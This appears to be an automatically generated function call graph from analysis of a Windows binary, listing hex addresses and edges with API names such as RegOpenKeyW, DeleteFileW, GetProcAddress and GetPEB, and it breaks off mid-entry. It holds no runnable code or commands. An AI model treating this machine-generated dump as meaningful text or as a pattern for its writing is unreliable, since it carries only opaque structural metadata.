8445->8446 8446->8432 8446->8435 8446->8437 8446->8439 8446->8441 8446->8445 8447 40a1b6 14 API calls 8446->8447 8511 4044ee 8446->8511 8447->8446 8449 413ad7 8448->8449 8457 409451 8448->8457 8450 405781 4 API calls 8449->8450 8451 413af0 8450->8451 8452 405781 4 API calls 8451->8452 8453 413afe 8452->8453 8454 405762 4 API calls 8453->8454 8455 413b0e 8454->8455 8456 405781 4 API calls 8455->8456 8455->8457 8456->8457 8458 405695 8457->8458 8459 4056a0 8458->8459 8463 4056b9 8458->8463 8460 402bab 2 API calls 8459->8460 8461 4056b3 8460->8461 8462 402bab 2 API calls 8461->8462 8462->8463 8463->8357 8465 40a368 8464->8465 8466 40a39a 8464->8466 8470 4031e5 4 API calls 8465->8470 8467 40a3af 8466->8467 8468 4031e5 4 API calls 8466->8468 8469 40a3ca 8467->8469 8471 408b2c 4 API calls 8467->8471 8468->8467 8472 408b2c 4 API calls 8469->8472 8473 40a38a 8469->8473 8470->8473 8471->8469 8472->8473 8473->8346 8475 4031e5 4 API calls 8474->8475 8476 408b3e 8475->8476 8476->8419 8478 40a202 8477->8478 8479 40a1c3 8477->8479 8633 405f08 8478->8633 8480 405b6f 6 API calls 8479->8480 8483 40a1d0 8480->8483 8482 40a1fc 8482->8437 8483->8482 8485 40a1f3 8483->8485 8521 40a45b 8483->8521 8488 402bab 2 API calls 8485->8488 8486 402bab 2 API calls 8486->8482 8488->8482 8489 405b6f 6 API calls 8491 40a245 8489->8491 8490 40a25d 8492 405b6f 6 API calls 8490->8492 8491->8490 8493 413a58 13 API calls 8491->8493 8498 40a26b 8492->8498 8495 40a257 8493->8495 8494 40a28b 8496 405b6f 6 API calls 8494->8496 8497 402bab 2 API calls 8495->8497 8499 40a297 8496->8499 8497->8490 8498->8494 8500 40a284 8498->8500 8640 40955b 8498->8640 8504 40a2b0 8499->8504 8508 40a2b7 8499->8508 8647 40968e 8499->8647 8502 402bab 2 API calls 8500->8502 8502->8494 8503 405b6f 6 API calls 8503->8508 8506 402bab 2 API calls 8504->8506 8506->8508 8507 40a333 8507->8486 8508->8503 8508->8507 8509 402bab 2 API calls 8508->8509 8657 4098a7 8508->8657 8509->8508 8512 402b7c 2 API calls 8511->8512 8513 404512 8512->8513 8515 404585 GetLastError 8513->8515 8517 402bab 2 API calls 8513->8517 8519 40457c 8513->8519 8520 402b7c 2 API calls 8513->8520 8912 4044a7 8513->8912 8516 404592 8515->8516 8515->8519 8518 402bab 2 API calls 8516->8518 8517->8513 8518->8519 8519->8446 8520->8513 8666 40642c 8521->8666 8523 40a469 8524 40c4ff 8523->8524 8669 4047e6 8523->8669 8524->8485 8527 4040bb 12 API calls 8528 40bf88 8527->8528 8528->8524 8529 403c90 8 API calls 8528->8529 8530 40bfaa 8529->8530 8531 402b7c 2 API calls 8530->8531 8533 40bfc1 8531->8533 8532 40c4f3 8534 403f9e 5 API calls 8532->8534 8535 40c3aa 8533->8535 8676 40a423 8533->8676 8534->8524 8535->8532 8538 4056bf 2 API calls 8535->8538 8541 40c4e3 8535->8541 8536 402bab 2 API calls 8536->8532 8540 40c3d2 8538->8540 8540->8541 8543 4040bb 12 API calls 8540->8543 8541->8536 8542 405f08 4 API calls 8544 40c005 8542->8544 8545 40c3f3 8543->8545 8546 40c021 8544->8546 8679 40a43f 8544->8679 8548 40c4d1 8545->8548 8736 405a52 8545->8736 8547 4031e5 4 API calls 8546->8547 8550 40c034 8547->8550 8553 413aca 4 API calls 8548->8553 8559 4031e5 4 API calls 8550->8559 8554 40c4dd 8553->8554 8557 405695 2 API calls 8554->8557 8555 40c411 8741 405a87 8555->8741 8556 402bab 2 API calls 8556->8546 8557->8541 8565 40c04d 8559->8565 8560 40c4b3 8561 402bab 2 API calls 8560->8561 8563 40c4cb 8561->8563 8562 405a52 4 API calls 8573 40c423 8562->8573 8564 403f9e 5 API calls 8563->8564 8564->8548 8567 4031e5 4 API calls 8565->8567 8566 405a87 4 API calls 8566->8573 8568 40c085 8567->8568 8570 4031e5 4 API calls 8568->8570 8569 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8569->8573 8571 40c09c 8570->8571 8574 4031e5 4 API calls 8571->8574 8572 402bab 2 API calls 8572->8573 8573->8560 8573->8562 8573->8566 8573->8569 8573->8572 8575 40c0b3 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c0ca 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c0e7 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c100 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c119 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c132 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c14b 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c164 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c17d 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c196 8592->8593 8594 4031e5 4 API calls 8593->8594 8595 40c1af 8594->8595 8596 4031e5 4 API calls 8595->8596 8597 40c1c8 8596->8597 8598 4031e5 4 API calls 8597->8598 8599 40c1de 8598->8599 8600 4031e5 4 API calls 8599->8600 8601 40c1f4 8600->8601 8602 4031e5 4 API calls 8601->8602 8603 40c20d 8602->8603 8604 4031e5 4 API calls 8603->8604 8605 40c226 8604->8605 8606 4031e5 4 API calls 8605->8606 8607 40c23f 8606->8607 8608 4031e5 4 API calls 8607->8608 8609 40c258 8608->8609 8610 4031e5 4 API calls 8609->8610 8611 40c273 8610->8611 8612 4031e5 4 API calls 8611->8612 8613 40c28a 8612->8613 8614 4031e5 4 API calls 8613->8614 8617 40c2d5 8614->8617 8615 40c3a2 8616 402bab 2 API calls 8615->8616 8616->8535 8617->8615 8618 4031e5 4 API calls 8617->8618 8619 40c315 8618->8619 8620 40c38b 8619->8620 8682 404866 8619->8682 8621 403c40 5 API calls 8620->8621 8623 40c397 8621->8623 8625 403c40 5 API calls 8623->8625 8625->8615 8626 40c382 8628 403c40 5 API calls 8626->8628 8628->8620 8630 406c4c 6 API calls 8631 40c355 8630->8631 8631->8626 8706 4126a7 8631->8706 8634 4031e5 4 API calls 8633->8634 8635 405f1d 8634->8635 8636 405f55 8635->8636 8637 402b7c 2 API calls 8635->8637 8636->8482 8636->8489 8636->8490 8636->8507 8638 405f36 8637->8638 8638->8636 8639 4031e5 4 API calls 8638->8639 8639->8636 8641 409673 8640->8641 8646 40956d 8640->8646 8641->8500 8642 408b45 6 API calls 8642->8646 8643 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8643->8646 8644 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8644->8646 8645 402bab GetProcessHeap HeapFree 8645->8646 8646->8641 8646->8642 8646->8643 8646->8644 8646->8645 8648 4040bb 12 API calls 8647->8648 8652 4096a9 8648->8652 8649 40989f 8649->8504 8650 409896 8651 403f9e 5 API calls 8650->8651 8651->8649 8652->8649 8652->8650 8654 408b45 6 API calls 8652->8654 8655 402bab GetProcessHeap HeapFree 8652->8655 8656 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8652->8656 8905 4059d8 8652->8905 8654->8652 8655->8652 8656->8652 8658 4040bb 12 API calls 8657->8658 8664 4098c1 8658->8664 8659 4099fb 8659->8508 8660 4099f3 8661 403f9e 5 API calls 8660->8661 8661->8659 8662 4059d8 4 API calls 8662->8664 8663 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8663->8664 8664->8659 8664->8660 8664->8662 8664->8663 8665 402bab GetProcessHeap HeapFree 8664->8665 8665->8664 8667 4031e5 4 API calls 8666->8667 8668 406441 GetNativeSystemInfo 8667->8668 8668->8523 8670 4031e5 4 API calls 8669->8670 8672 40480a 8670->8672 8671 4031e5 4 API calls 8671->8672 8672->8671 8674 40484f 8672->8674 8675 40485d 8672->8675 8673 403c40 5 API calls 8673->8675 8674->8673 8675->8524 8675->8527 8677 4031e5 4 API calls 8676->8677 8678 40a435 8677->8678 8678->8542 8680 4031e5 4 API calls 8679->8680 8681 40a451 8680->8681 8681->8556 8683 4031e5 4 API calls 8682->8683 8684 40487c 8683->8684 8684->8626 8685 406c4c 8684->8685 8746 4068eb 8685->8746 8687 406e02 8687->8630 8688 406cab 8758 40469b 8688->8758 8689 406c6c 8689->8687 8689->8688 8755 406894 8689->8755 8696 406df1 8697 40469b 4 API calls 8696->8697 8697->8687 8698 406cef 8698->8696 8699 4031e5 4 API calls 8698->8699 8700 406d26 8699->8700 8700->8696 8701 40771e 6 API calls 8700->8701 8705 406d57 8701->8705 8702 406da2 8703 4031e5 4 API calls 8702->8703 8703->8696 8705->8702 8771 4068b0 8705->8771 8707 4126bb 8706->8707 8708 4126d1 8706->8708 8709 412840 8707->8709 8827 40488c 8707->8827 8708->8709 8833 407055 8708->8833 8709->8626 8713 412837 8714 403c40 5 API calls 8713->8714 8714->8709 8717 41281e 8718 4070ff 6 API calls 8717->8718 8718->8713 8719 407055 6 API calls 8720 412742 8719->8720 8720->8717 8721 40719a 6 API calls 8720->8721 8722 41276e 8721->8722 8735 412804 8722->8735 8849 406f4a 8722->8849 8725 41279a 8855 412553 8725->8855 8877 4070ff 8735->8877 8899 405907 8736->8899 8738 405a61 8739 405a76 8738->8739 8740 405907 4 API calls 8738->8740 8739->8555 8740->8738 8742 402b7c 2 API calls 8741->8742 8745 405a99 8742->8745 8743 405ade 8743->8573 8745->8743 8902 40595e 8745->8902 8774 4076a8 8746->8774 8748 406913 8749 406a61 8748->8749 8750 40771e 6 API calls 8748->8750 8749->8689 8754 406949 8750->8754 8751 40771e 6 API calls 8751->8754 8753 404678 4 API calls 8753->8754 8754->8749 8754->8751 8754->8753 8780 4046c2 8754->8780 8756 4031e5 4 API calls 8755->8756 8757 4068a6 8756->8757 8757->8689 8759 4046b4 8758->8759 8760 4046a4 8758->8760 8759->8687 8762 404678 8759->8762 8761 4031e5 4 API calls 8760->8761 8761->8759 8763 4031e5 4 API calls 8762->8763 8764 40468b 8763->8764 8764->8687 8765 40771e 8764->8765 8766 407737 8765->8766 8770 407748 8765->8770 8767 407644 6 API calls 8766->8767 8768 407741 8767->8768 8769 406baa 6 API calls 8768->8769 8769->8770 8770->8698 8772 4031e5 4 API calls 8771->8772 8773 4068c2 8772->8773 8773->8705 8775 4076c1 8774->8775 8779 4076d2 8774->8779 8788 407644 8775->8788 8779->8748 8781 4046d3 8780->8781 8782 4046d9 8780->8782 8823 40464c 8781->8823 8784 4046e9 8782->8784 8786 404678 4 API calls 8782->8786 8785 404714 8784->8785 8787 40469b 4 API calls 8784->8787 8785->8754 8786->8784 8787->8785 8789 407653 8788->8789 8790 407661 8788->8790 8789->8790 8796 406a6b 8789->8796 8792 406baa 8790->8792 8793 406bbb 8792->8793 8795 406bc8 8792->8795 8793->8795 8804 407402 8793->8804 8795->8779 8800 406a81 8796->8800 8797 402b7c 2 API calls 8797->8800 8798 406b8b 8798->8790 8799 406894 4 API calls 8799->8800 8800->8797 8800->8798 8800->8799 8801 406b96 8800->8801 8802 402bab 2 API calls 8800->8802 8803 402bab 2 API calls 8801->8803 8802->8800 8803->8798 8805 407644 6 API calls 8804->8805 8806 407412 8805->8806 8807 402b7c 2 API calls 8806->8807 8814 407450 8806->8814 8808 407483 8807->8808 8809 402b7c 2 API calls 8808->8809 8808->8814 8812 4074ce 8809->8812 8810 4074da 8811 4068cc 2 API calls 8810->8811 8811->8814 8812->8810 8813 402b7c 2 API calls 8812->8813 8817 40751f 8813->8817 8814->8795 8815 40752b 8816 4068cc 2 API calls 8815->8816 8816->8810 8817->8815 8819 4068cc 8817->8819 8820 4068d6 8819->8820 8821 4068e3 8819->8821 8820->8821 8822 402bab GetProcessHeap HeapFree 8820->8822 8821->8815 8822->8821 8824 404666 8823->8824 8825 404659 8823->8825 8824->8782 8826 4031e5 4 API calls 8825->8826 8826->8824 8828 4047e6 5 API calls 8827->8828 8829 404897 8828->8829 8830 40489c 8829->8830 8885 4047c7 8829->8885 8830->8708 8834 40706f 8833->8834 8835 407084 8833->8835 8834->8835 8836 407644 6 API calls 8834->8836 8840 4070e4 8835->8840 8888 406fd2 8835->8888 8837 40707d 8836->8837 8839 406baa 6 API calls 8837->8839 8839->8835 8840->8713 8841 40719a 8840->8841 8842 4071b0 8841->8842 8844 4071c5 8841->8844 8843 407644 6 API calls 8842->8843 8842->8844 8845 4071be 8843->8845 8847 406fd2 4 API calls 8844->8847 8848 407226 8844->8848 8846 406baa 6 API calls 8845->8846 8846->8844 8847->8848 8848->8717 8848->8719 8850 406f64 8849->8850 8853 406f75 8849->8853 8851 407644 6 API calls 8850->8851 8852 406f6e 8851->8852 8854 406baa 6 API calls 8852->8854 8853->8725 8854->8853 8896 4060ac 8855->8896 8878 407116 8877->8878 8879 40712b 8877->8879 8878->8879 8880 407644 6 API calls 8878->8880 8883 407187 8879->8883 8884 406fd2 4 API calls 8879->8884 8881 407124 8880->8881 8882 406baa 6 API calls 8881->8882 8882->8879 8883->8717 8884->8883 8886 4031e5 4 API calls 8885->8886 8887 4047d9 8886->8887 8887->8708 8889 406fde 8888->8889 8890 407027 8889->8890 8891 4031e5 4 API calls 8889->8891 8890->8840 8892 406ffa 8891->8892 8893 4031e5 4 API calls 8892->8893 8894 407011 8893->8894 8895 4031e5 4 API calls 8894->8895 8895->8890 8897 4031e5 4 API calls 8896->8897 8898 4060bb 8897->8898 8898->8898 8900 4031e5 4 API calls 8899->8900 8901 40591a 8900->8901 8901->8738 8903 4031e5 4 API calls 8902->8903 8904 405971 8903->8904 8904->8745 8906 4031e5 4 API calls 8905->8906 8907 4059ed 8906->8907 8908 402b7c 2 API calls 8907->8908 8911 405a38 8907->8911 8909 405a16 8908->8909 8910 4031e5 4 API calls 8909->8910 8909->8911 8910->8911 8911->8652 8913 4031e5 4 API calls 8912->8913 8914 4044b9 8913->8914 8914->8513 9834 40a349 9835 4098a7 13 API calls 9834->9835 9836 40a359 9835->9836 9073 408952 9094 40823f 9073->9094 9076 408960 9078 4056bf 2 API calls 9076->9078 9079 40896a 9078->9079 9122 408862 9079->9122 9081 413aca 4 API calls 9082 4089d4 9081->9082 9084 405695 2 API calls 9082->9084 9083 408975 9091 4089c4 9083->9091 9130 4087d6 9083->9130 9086 4089df 9084->9086 9091->9081 9092 402bab 2 API calls 9093 40899d 9092->9093 9093->9091 9093->9092 9095 40824d 9094->9095 9096 40831b 9095->9096 9097 4031e5 4 API calls 9095->9097 9096->9076 9110 4083bb 9096->9110 9098 40826d 9097->9098 9099 4031e5 4 API calls 9098->9099 9100 408289 9099->9100 9101 4031e5 4 API calls 9100->9101 9102 4082a5 9101->9102 9103 4031e5 4 API calls 9102->9103 9104 4082c1 9103->9104 9105 4031e5 4 API calls 9104->9105 9106 4082e2 9105->9106 9107 4031e5 4 API calls 9106->9107 9108 4082ff 9107->9108 9109 4031e5 4 API calls 9108->9109 9109->9096 9158 408363 9110->9158 9113 4084ab 9113->9076 9114 4056bf 2 API calls 9119 4083f4 9114->9119 9115 408492 9116 413aca 4 API calls 9115->9116 9117 4084a0 9116->9117 9118 405695 2 API calls 9117->9118 9118->9113 9119->9115 9161 40815d 9119->9161 9176 40805d 9119->9176 9191 404b8f 9122->9191 9124 408946 9124->9083 9125 40887e 9125->9124 9126 4031e5 4 API calls 9125->9126 9127 40893e 9125->9127 9129 402b7c 2 API calls 9125->9129 9126->9125 9194 404a39 9127->9194 9129->9125 9131 402b7c 2 API calls 9130->9131 9132 4087e7 9131->9132 9133 40885a 9132->9133 9134 4031e5 4 API calls 9132->9134 9142 408749 9133->9142 9135 408802 9134->9135 9138 40884d 9135->9138 9141 408853 9135->9141 9203 408522 9135->9203 9207 4084b4 9135->9207 9136 402bab 2 API calls 9136->9133 9210 4084d4 9138->9210 9141->9136 9143 404b8f 5 API calls 9142->9143 9145 408765 9143->9145 9144 4031e5 4 API calls 9144->9145 9145->9144 9146 408522 4 API calls 9145->9146 9147 4087c7 9145->9147 9149 4087cf 9145->9149 9146->9145 9148 404a39 5 API calls 9147->9148 9148->9149 9150 4085d1 9149->9150 9152 4086c2 9150->9152 9156 4085e9 9150->9156 9152->9093 9153 402bab 2 API calls 9153->9156 9154 4031e5 4 API calls 9154->9156 9156->9152 9156->9153 9156->9154 9216 4089e6 9156->9216 9235 4086c9 9156->9235 9239 4036a3 9156->9239 9159 4031e5 4 API calls 9158->9159 9160 408386 9159->9160 9160->9113 9160->9114 9162 40816f 9161->9162 9163 4081b6 9162->9163 9164 4081fd 9162->9164 9175 4081ef 9162->9175 9165 405872 4 API calls 9163->9165 9166 405872 4 API calls 9164->9166 9167 4081cf 9165->9167 9168 408213 9166->9168 9169 405872 4 API calls 9167->9169 9170 405872 4 API calls 9168->9170 9171 4081df 9169->9171 9172 408222 9170->9172 9173 405872 4 API calls 9171->9173 9174 405872 4 API calls 9172->9174 9173->9175 9174->9175 9175->9119 9177 40808c 9176->9177 9178 4080d2 9177->9178 9179 408119 9177->9179 9190 40810b 9177->9190 9181 405872 4 API calls 9178->9181 9180 405872 4 API calls 9179->9180 9182 40812f 9180->9182 9183 4080eb 9181->9183 9185 405872 4 API calls 9182->9185 9184 405872 4 API calls 9183->9184 9186 4080fb 9184->9186 9187 40813e 9185->9187 9188 405872 4 API calls 9186->9188 9189 405872 4 API calls 9187->9189 9188->9190 9189->9190 9190->9119 9197 404a19 9191->9197 9193 404ba0 9193->9125 9200 4049ff 9194->9200 9196 404a44 9196->9124 9198 4031e5 4 API calls 9197->9198 9199 404a2c RegOpenKeyW 9198->9199 9199->9193 9201 4031e5 4 API calls 9200->9201 9202 404a12 RegCloseKey 9201->9202 9202->9196 9205 408534 9203->9205 9204 4085af 9204->9135 9205->9204 9213 4084ee 9205->9213 9208 4031e5 4 API calls 9207->9208 9209 4084c7 9208->9209 9209->9135 9211 4031e5 4 API calls 9210->9211 9212 4084e7 9211->9212 9212->9141 9214 4031e5 4 API calls 9213->9214 9215 408501 9214->9215 9215->9204 9217 4031e5 4 API calls 9216->9217 9218 408a06 9217->9218 9219 408b21 9218->9219 9220 4031e5 4 API calls 9218->9220 9219->9156 9221 408a32 9220->9221 9228 408b17 9221->9228 9242 403666 9221->9242 9225 408b0e 9248 40362f 9225->9248 9226 4031e5 4 API calls 9229 408a88 9226->9229 9251 403649 9228->9251 9229->9225 9230 4031e5 4 API calls 9229->9230 9231 408ac4 9230->9231 9232 405b6f 6 API calls 9231->9232 9233 408aff 9232->9233 9233->9225 9245 408508 9233->9245 9236 4086e2 9235->9236 9237 408744 9235->9237 9236->9237 9238 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9236->9238 9237->9156 9238->9236 9240 4031e5 4 API calls 9239->9240 9241 4036b5 9240->9241 9241->9156 9243 4031e5 4 API calls 9242->9243 9244 403679 9243->9244 9244->9225 9244->9226 9246 4031e5 4 API calls 9245->9246 9247 40851b 9246->9247 9247->9225 9249 4031e5 4 API calls 9248->9249 9250 403642 9249->9250 9250->9228 9252 4031e5 4 API calls 9251->9252 9253 40365c 9252->9253 9253->9219 9854 40f252 9855 404bee 6 API calls 9854->9855 9856 40f269 9855->9856 9857 404bee 6 API calls 9856->9857 9863 40f2ff 9856->9863 9858 40f282 9857->9858 9859 404bee 6 API calls 9858->9859 9860 40f290 9859->9860 9871 404c4e 9860->9871 9862 40f2a7 9862->9863 9864 405872 4 API calls 9862->9864 9865 40f2cd 9864->9865 9866 405872 4 API calls 9865->9866 9867 40f2dc 9866->9867 9868 405872 4 API calls 9867->9868 9869 40f2ee 9868->9869 9870 405762 4 API calls 9869->9870 9870->9863 9872 402b7c 2 API calls 9871->9872 9874 404c60 9872->9874 9873 404ca4 9873->9862 9874->9873 9875 4031e5 4 API calls 9874->9875 9876 404c8d 9875->9876 9876->9873 9877 402bab 2 API calls 9876->9877 9877->9873 9878 41045c 9879 4040bb 12 API calls 9878->9879 9880 410477 9879->9880 9881 41060b 9880->9881 9909 407851 9880->9909 9883 41048f 9885 407851 2 API calls 9883->9885 9889 410604 9883->9889 9884 403f9e 5 API calls 9884->9881 9886 4104a9 9885->9886 9891 4105e0 9886->9891 9892 405ae9 6 API calls 9886->9892 9894 41056f 9886->9894 9895 4105eb 9886->9895 9887 402bab 2 API calls 9887->9889 9888 402bab 2 API calls 9890 4105fb 9888->9890 9889->9884 9890->9887 9893 402bab 2 API calls 9891->9893 9891->9895 9892->9886 9893->9895 9894->9891 9896 4105d6 9894->9896 9898 412269 6 API calls 9894->9898 9895->9888 9895->9890 9897 402bab 2 API calls 9896->9897 9897->9891 9899 410580 9898->9899 9899->9896 9900 405872 4 API calls 9899->9900 9901 410599 9900->9901 9902 405872 4 API calls 9901->9902 9903 4105a9 9902->9903 9904 405872 4 API calls 9903->9904 9905 4105bb 9904->9905 9906 405872 4 API calls 9905->9906 9907 4105cd 9906->9907 9908 402bab 2 API calls 9907->9908 9908->9896 9910 407866 9909->9910 9911 402b7c 2 API calls 9910->9911 9912 407899 9910->9912 9911->9912 9912->9883 9315 40f561 9318 40f4b6 9315->9318 9319 413b28 6 API calls 9318->9319 9324 40f4bf 9319->9324 9320 40f559 9321 405b6f 6 API calls 9321->9324 9322 402bab GetProcessHeap HeapFree 9322->9324 9323 413a58 13 API calls 9323->9324 9324->9320 9324->9321 9324->9322 9324->9323 9328 403b64 9329 4031e5 4 API calls 9328->9329 9330 403b77 PathFileExistsW 9329->9330 9944 40d069 9945 404bee 6 API calls 9944->9945 9946 40d080 9945->9946 9947 404bee 6 API calls 9946->9947 9968 40d1e2 9946->9968 9948 40d099 9947->9948 9949 404bee 6 API calls 9948->9949 9950 40d0a7 9949->9950 9985 404ba7 9950->9985 9953 404bee 6 API calls 9954 40d0c5 9953->9954 9955 404c4e 6 API calls 9954->9955 9956 40d0dc 9955->9956 9957 404bee 6 API calls 9956->9957 9958 40d0eb 9957->9958 9959 404ba7 4 API calls 9958->9959 9960 40d0fa 9959->9960 9961 404bee 6 API calls 9960->9961 9962 40d109 9961->9962 9963 404c4e 6 API calls 9962->9963 9964 40d123 9963->9964 9965 405872 4 API calls 9964->9965 9964->9968 9966 40d14a 9965->9966 9967 405872 4 API calls 9966->9967 9969 40d159 9967->9969 9970 405872 4 API calls 9969->9970 9971 40d16b 9970->9971 9972 405781 4 API calls 9971->9972 9973 40d179 9972->9973 9974 405872 4 API calls 9973->9974 9975 40d18b 9974->9975 9976 405762 4 API calls 9975->9976 9977 40d19f 9976->9977 9978 405872 4 API calls 9977->9978 9979 40d1b1 9978->9979 9980 405781 4 API calls 9979->9980 9981 40d1bf 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d1d1 9982->9983 9984 405762 4 API calls 9983->9984 9984->9968 9986 4031e5 4 API calls 9985->9986 9987 404bca 9986->9987 9987->9953 9357 40f16e 9358 4056bf 2 API calls 9357->9358 9359 40f17b 9358->9359 9360 412093 20 API calls 9359->9360 9361 40f19e 9360->9361 9362 412093 20 API calls 9361->9362 9363 40f1b6 9362->9363 9364 412093 20 API calls 9363->9364 9365 40f1cc 9364->9365 9366 412093 20 API calls 9365->9366 9367 40f1e2 9366->9367 9368 413aca 4 API calls 9367->9368 9369 40f1ef 9368->9369 9370 405695 2 API calls 9369->9370 9371 40f1fa 9370->9371 9372 40ce71 9373 413b28 6 API calls 9372->9373 9374 40ce78 9373->9374 9375 405b6f 6 API calls 9374->9375 9378 40ce83 9375->9378 9376 40cec1 9377 403fbf 7 API calls 9376->9377 9379 40cecc 9377->9379 9378->9376 9380 403d74 19 API calls 9378->9380 9390 40ceba 9378->9390 9382 403d74 19 API calls 9379->9382 9389 40cefb 9379->9389 9384 40cead 9380->9384 9381 402bab 2 API calls 9381->9376 9383 40cee7 9382->9383 9385 402bab 2 API calls 9383->9385 9388 40cef4 9383->9388 9387 402bab 2 API calls 9384->9387 9384->9390 9385->9388 9386 402bab 2 API calls 9386->9389 9387->9390 9388->9386 9390->9381 9391 406472 9392 4031e5 4 API calls 9391->9392 9393 406484 Sleep 9392->9393 10061 40f204 10062 405781 4 API calls 10061->10062 10063 40f214 10062->10063 10064 4057df 13 API calls 10063->10064 10065 40f226 10064->10065 9451 403c08 9452 4031e5 4 API calls 9451->9452 9453 403c1a DeleteFileW 9452->9453 9454 410a09 9455 41219c 14 API calls 9454->9455 9456 410a1b 9455->9456 9457 41219c 14 API calls 9456->9457 9458 410a23 9457->9458 9459 41219c 14 API calls 9458->9459 9460 410a2c 9459->9460 9461 41219c 14 API calls 9460->9461 9462 410a38 9461->9462 9463 404b22 6 API calls 9462->9463 9464 410a4c 9463->9464 9465 410a7a 9464->9465 9466 403fbf 7 API calls 9464->9466 9467 410a5c 9466->9467 9468 410a71 9467->9468 9469 413a58 13 API calls 9467->9469 9470 402bab 2 API calls 9468->9470 9471 410a6b 9469->9471 9470->9465 9472 402bab 2 API calls 9471->9472 9472->9468 10066 410d09 10067 410d56 10066->10067 10068 410d17 10066->10068 10070 413a58 13 API calls 10067->10070 10082 406642 10068->10082 10072 410d6f 10070->10072 10073 4056bf 2 API calls 10074 410d2e 10073->10074 10095 405641 10074->10095 10076 410d41 10077 413aca 4 API calls 10076->10077 10078 410d4a 10077->10078 10079 405695 2 API calls 10078->10079 10080 410d50 10079->10080 10081 4036a3 4 API calls 10080->10081 10081->10067 10083 406662 10082->10083 10084 4031e5 4 API calls 10083->10084 10085 406676 10084->10085 10099 4066bf 10085->10099 10090 4066b1 10092 4036a3 4 API calls 10090->10092 10091 4066a7 10093 4036a3 4 API calls 10091->10093 10094 4066ac 10092->10094 10093->10094 10094->10067 10094->10073 10096 40564d 10095->10096 10097 405673 10095->10097 10096->10097 10098 4056fc 4 API calls 10096->10098 10097->10076 10098->10097 10100 4031e5 4 API calls 10099->10100 10101 4066dc 10100->10101 10102 4066f6 SetLastError 10101->10102 10103 406708 GetLastError 10101->10103 10104 406693 10102->10104 10103->10104 10105 406713 10103->10105 10121 406455 10104->10121 10106 4031e5 4 API calls 10105->10106 10107 406725 10106->10107 10107->10104 10108 4031e5 4 API calls 10107->10108 10109 40673f 10108->10109 10110 406753 10109->10110 10111 406749 10109->10111 10112 4031e5 4 API calls 10110->10112 10113 4036a3 4 API calls 10111->10113 10114 406761 10112->10114 10113->10104 10115 40678a 10114->10115 10116 40677c 10114->10116 10118 4036a3 4 API calls 10115->10118 10117 4036a3 4 API calls 10116->10117 10119 406781 10117->10119 10118->10104 10120 4036a3 4 API calls 10119->10120 10120->10104 10122 4031e5 4 API calls 10121->10122 10123 406468 10122->10123 10123->10090 10123->10091 9473 40c509 9474 412093 20 API calls 9473->9474 9475 40c51e 9474->9475 9482 40910d 9483 404b22 6 API calls 9482->9483 9484 409124 9483->9484 9485 40917a 9484->9485 9486 405b6f 6 API calls 9484->9486 9487 40913e 9486->9487 9489 404b22 6 API calls 9487->9489 9495 409173 9487->9495 9488 402bab 2 API calls 9488->9485 9490 409153 9489->9490 9491 40916a 9490->9491 9493 409408 15 API calls 9490->9493 9492 402bab 2 API calls 9491->9492 9492->9495 9494 409164 9493->9494 9496 402bab 2 API calls 9494->9496 9495->9488 9496->9491 9500 410410 9501 4056bf 2 API calls 9500->9501 9502 41041b 9501->9502 9503 412093 20 API calls 9502->9503 9504 41043c 9503->9504 9505 413aca 4 API calls 9504->9505 9506 410449 9505->9506 9507 405695 2 API calls 9506->9507 9508 410454 9507->9508 9535 40c71a 9536 41219c 14 API calls 9535->9536 9537 40c728 9536->9537 10179 410b1a 10180 404bee 6 API calls 10179->10180 10182 410b31 10180->10182 10181 410c6d 10182->10181 10183 404bee 6 API calls 10182->10183 10184 410b5a 10183->10184 10185 404bee 6 API calls 10184->10185 10186 410b69 10185->10186 10187 404bee 6 API calls 10186->10187 10188 410b78 10187->10188 10189 404ba7 4 API calls 10188->10189 10190 410b86 10189->10190 10191 404ba7 4 API calls 10190->10191 10192 410b95 10191->10192 10192->10181 10193 405872 4 API calls 10192->10193 10194 410bd7 10193->10194 10195 405872 4 API calls 10194->10195 10196 410be8 10195->10196 10197 405872 4 API calls 10196->10197 10198 410bf9 10197->10198 10199 405781 4 API calls 10198->10199 10200 410c07 10199->10200 10201 405781 4 API calls 10200->10201 10205 410c15 10201->10205 10202 410c4e 10203 405762 4 API calls 10202->10203 10204 410c60 10203->10204 10204->10181 10207 403f9e 5 API calls 10204->10207 10205->10202 10212 405e5a 10205->10212 10207->10181 10209 4040bb 12 API calls 10210 410c44 10209->10210 10211 402bab 2 API calls 10210->10211 10211->10202 10213 402b7c 2 API calls 10212->10213 10215 405e72 10213->10215 10214 405ea3 10214->10202 10214->10209 10215->10214 10216 4031e5 4 API calls 10215->10216 10217 405e94 10216->10217 10217->10214 10218 402bab 2 API calls 10217->10218 10218->10214 10219 40f81c 10220 404bee 6 API calls 10219->10220 10221 40f833 10220->10221 10222 404bee 6 API calls 10221->10222 10236 40f94f 10221->10236 10223 40f85c 10222->10223 10224 404bee 6 API calls 10223->10224 10225 40f86b 10224->10225 10226 404bee 6 API calls 10225->10226 10227 40f87a 10226->10227 10228 404bee 6 API calls 10227->10228 10229 40f888 10228->10229 10230 404ba7 4 API calls 10229->10230 10231 40f897 10230->10231 10232 405872 4 API calls 10231->10232 10231->10236 10233 40f8d8 10232->10233 10234 405872 4 API calls 10233->10234 10235 40f8ea 10234->10235 10237 405872 4 API calls 10235->10237 10238 40f8fa 10237->10238 10239 405872 4 API calls 10238->10239 10240 40f90c 10239->10240 10241 405781 4 API calls 10240->10241 10242 40f91d 10241->10242 10243 4040bb 12 API calls 10242->10243 10244 40f92d 10243->10244 10245 405762 4 API calls 10244->10245 10246 40f93f 10245->10246 10246->10236 10247 403f9e 5 API calls 10246->10247 10247->10236 9550 402c1f 9551 4031e5 